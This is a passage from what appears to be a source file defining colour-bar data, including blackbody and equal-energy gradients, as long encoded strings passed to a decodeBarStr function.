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")
bar_blackbody = decodeBarStr("+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+
7//+9///9/////////////////QQQ/++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ/QQQ/QQQ//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/QQQ/QQQ/++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//o
B//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//QQQ/++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA/+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/QQQ//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/++//QQQ/++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LA4+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA/QQQ/QQQ//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ/QQQ//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////QQQ/QQQ/++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAs+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46
//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAc+LA/+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAK+LAz+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAA+LAa+MA/+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAA+LAA+MAf+NA/+OA/+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2
n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAA+LAA+MAA+NAa+OAz+QA/+RA/+SA/+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//+LAA+LAA+MAA+NAA+OAK+QAc+RAs+SA4+TA/+VA/+WA/+XA/+ZA/+aA//bA//cA//eA//fA//gA//hA//iA//kA//lA//mA//nA//oA//oB//pD//pE//qF//qG//qH//rI//rJ//sK//sM//sN//tO//tP//uQ//uR//vS//vT//vU//wW//wX//xY//xZ//xa//yb//yc//zd//ze//zg//0h//0i//1j//1k//1l//2m//2n//3p//3q//4r//4s//4t//5u//5v//6w//6y//6y//70//71//82//83//84//95//96//+7//+9///9/////////////////+///++//++//++//++//9+//9+//99//99//89//89//89//88//88//78//78//78//78//67//67//67//67//57//57//56//56//56//46//46//46//45//35//35//35//35//24//24//24//24//24//13//13//13//13//03//03//03//02//z2//z2//z2//z2//02//")
bar_equalenergy = decodeBarStr("AAA/AAA/AAA/AAA/BBB/BBB/BBB/BBB/CCC/CCC/CDC/DDD/DDD/DDD/EEE/EEE/EFF/FFF/FFF/GGG/GGG/HGG/HHH/HHH/III/III/JJJ/JJJ/KJK/KKK/KKK/LLL/LLL/MMM/MMM/NNN/NNN/OOO/OOO/PPP/PPP/QQQ/QQQ/RRR/RRR/SSS/TSS/TTT/UUU/UUU/VVV/VVV/WWW/WWW/XXX/XXY/YYY/ZZZ/ZZZ/aaa/aaa/bbb/cbb/ccc/ddd/ddd/eee/eee/fff/ffg/ggg/hhh/hhh/iii/iii/jjj/kkk/kkk/lll/lll/mmm/mnm/nnn/ono/ooo/ppp/ppp/qqq/qqq/rrr/rrr/sss/sss/ttt/utu/uuu/vvv/vvv/www/www/xxx/xxx/yyy/yyy/zzz/zzz/000/000/111/111/122/222/222/333/333/444/444/545/555/555/666/666/667/777/777/788/888/888/999/999/999/9++/+++/+++/+++/////////////AAA/AAA/AA